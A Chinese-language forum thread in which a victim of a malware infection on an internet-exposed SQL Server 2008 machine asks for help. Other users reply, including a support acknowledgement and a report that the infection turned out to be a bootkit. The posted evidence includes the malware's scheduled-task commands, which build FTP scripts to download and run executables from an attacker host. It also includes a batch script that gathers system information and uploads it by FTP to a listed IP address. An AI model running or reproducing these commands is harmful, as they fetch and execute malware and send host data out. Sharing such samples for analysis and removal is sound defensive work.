黑客 大佬都过来看看，这个木马怎么处理？

我自从安装sql2008外网就没有连接通过，1433开放后就被中毒，不晓得他到底要干啥，所有杀毒被屏蔽，只要打开连包含关键字的标题框也被关闭，
360所有软件被开机时全部干掉

先上图，这是任务计划



这是自动下载的木马

这是木马内部内容，懂的看一眼就会了








附件木马自己研究，找到开机启动下载木马的程序位置说一声，我难得装系统
temp-conhou.rar (13.59 KB)

2020-8-29 21:34 上传

点击文件名下载附件
下载积分: 经验 -1

事件连接.txt (574 Bytes)

2020-8-29 21:34 上传

点击文件名下载附件
下载积分: 经验 -1

就看看有人出来处理没得？看看有大佬没得？，看看360工程师是不是自己的软件被干掉了这个问题都解决不了，期待解决

再给你们说，这家伙就用了个upx3.9加的壳，还加了3次，呵呵

MicrosoftsWindowsu    c:\windows\temp\conhou.exe


mysa   /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe

mysa2  /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

mysa3  /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe

ok  rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaa

@echo off
SETLOCAL ENABLEDELAYEDEXPANSION
for /f %%a in ('wmic nicconfig where^(ipenabled^=true^) get index^|findstr [0-99]') do set i=%%a
for /f %%a in ('wmic nicconfig where^(index^=%i%^) get macaddress^|findstr [0-99]') do set a=%%a &set a=!a::=!
tasklist>"c:\windows\debug\%a%.txt"
ver>>"c:\windows\debug\%a%.txt"
whoami>>"c:\windows\debug\%a%.txt"
dir c:\windows\debug>>"c:\windows\debug\%a%.txt"
dir c:\windows\temp>>"c:\windows\debug\%a%.txt"
@echo off
echo open 199.168.100.74>ftp.up
echo up>>ftp.up
echo 1433>> ftp.up
Echo binary>>ftp.up
Echo put "c:\windows\debug\*.txt">> ftp.up
Echo bye>>ftp.up
FTP -s:ftp.up
del ftp.up /q
exit

您好，收到，我们先看下您提供的附件，进行分析，后续有结果和您反馈，谢谢

还没有解决啊，看来只有重装系统了

感谢四海一叶秋帮组解决，果然是Bootkit病毒，并且清理了全盘蠕虫

我的也是这个，还是服务器，咋个处理啊，求解